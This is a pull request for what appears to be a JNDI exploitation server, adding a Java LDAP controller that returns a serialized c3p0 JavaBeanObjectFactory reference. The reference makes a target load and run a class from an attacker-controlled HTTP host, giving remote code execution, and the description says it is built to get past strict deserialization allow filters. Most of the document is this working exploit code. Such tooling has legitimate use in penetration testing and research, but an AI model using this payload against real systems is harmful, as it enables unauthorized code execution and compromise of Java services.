### PR TITLE
Adding Controller for C3P0 ObjectFactory

### DIFF
--- a/README.md
+++ b/README.md
@@ -13,6 +13,7 @@ You can read about the full extent of our improvements in our [blog post](https:
 + Users can provide whole script files instead of single OS commands
 + Endpoint for serving generic deserialization payloads
 + New endpoint for exploiting H2 
++ New endpoint for exploiting targets with C3P0 
 + New endpoint for exploiting HSQLDB
 + The usage of [Testcontainers](https://github.com/testcontainers/testcontainers-java) for integration tests (also useful for manual testing, e.g. custom scripting payloads)
 

--- a/pom.xml
+++ b/pom.xml
@@ -35,6 +35,16 @@
             <version>1.8</version>
         </dependency>
         <dependency>
+            <groupId>commons-codec</groupId>
+            <artifactId>commons-codec</artifactId>
+            <version>1.18.0</version>
+        </dependency>
+        <dependency>
+            <groupId>com.mchange</groupId>
+            <artifactId>mchange-commons-java</artifactId>
+            <version>0.2.15</version>
+        </dependency>
+        <dependency>
             <groupId>junit</groupId>
             <artifactId>junit</artifactId>
             <version>4.12</version>

--- a/src/main/java/artsploit/controllers/C3p0.java
+++ b/src/main/java/artsploit/controllers/C3p0.java
@@ -1,0 +1,70 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationTargetException;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.IOException;
+import javax.naming.Name;
+import javax.naming.Reference;
+import java.util.Hashtable;
+import javax.naming.StringRefAddr;
+import org.apache.commons.codec.binary.Hex;
+
+import static artsploit.Utilities.serialize;
+
+/**
+ *  Via arbitrary bean creation in {@link com.mchange.v2.naming.JavaBeanObjectFactory} we can force the loading of
+ *  a reference object. This reference will be used by c3p0 to load bytecode from an attacker controlled service,
+ *  similar to a classic JNDI attack.
+ *
+ * Yields:
+ *  RCE via remote classloading.
+ *
+ * @author h0ng10
+ */
+@LdapMapping(uri = { "/o=c3p0" })
+public class C3p0 implements LdapController {
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP ResourceRef result for " + base );
+
+        String classloaderUrl = "http://" + Config.hostname + ":" + Config.httpPort + "/xExportObject.jar";
+
+        String overrideString = makeC3P0UserOverridesString(classloaderUrl, "xExportObject");
+        Entry e = new Entry(base);
+        e.addAttribute("javaClassName", "java.lang.String"); //could be any
+
+        Reference c3p0Reference = new Reference("com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", "com.mchange.v2.naming.JavaBeanObjectFactory", null);
+        c3p0Reference.add(new StringRefAddr("userOverridesAsString", overrideString));
+
+        e.addAttribute("javaSerializedData", serialize(c3p0Reference));
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+
+    // Taken from Moritz Bechlers Marshalsec repository
+    // https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
+    public static String makeC3P0UserOverridesString ( String codebase, String clazz ) throws ClassNotFoundException, NoSuchMethodException,
+            InstantiationException, IllegalAccessException, InvocationTargetException, IOException {
+
+        ByteArrayOutputStream b = new ByteArrayOutputStream();
+        try ( ObjectOutputStream oos = new ObjectOutputStream(b) ) {
+            Class<?> refclz = Class.forName("com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized"); //$NON-NLS-1$
+            Constructor<?> con = refclz.getDeclaredConstructor(Reference.class, Name.class, Name.class, Hashtable.class);
+            con.setAccessible(true);
+            Reference jndiref = new Reference("Foo", clazz, codebase);
+            Object ref = con.newInstance(jndiref, null, null, null);
+            oos.writeObject(ref);
+        }
+
+        return "HexAsciiSerializedMap:" + Hex.encodeHexString(b.toByteArray()) + ";"; //$NON-NLS-1$
+    }
+}


### PR DESCRIPTION
This pull request adds a new controller that can be used when exploiting targets that have a C3P0 gadget in their class path but use a very strict allow filter that prevents deserialization of the known C3P0 gadget from ysoserial.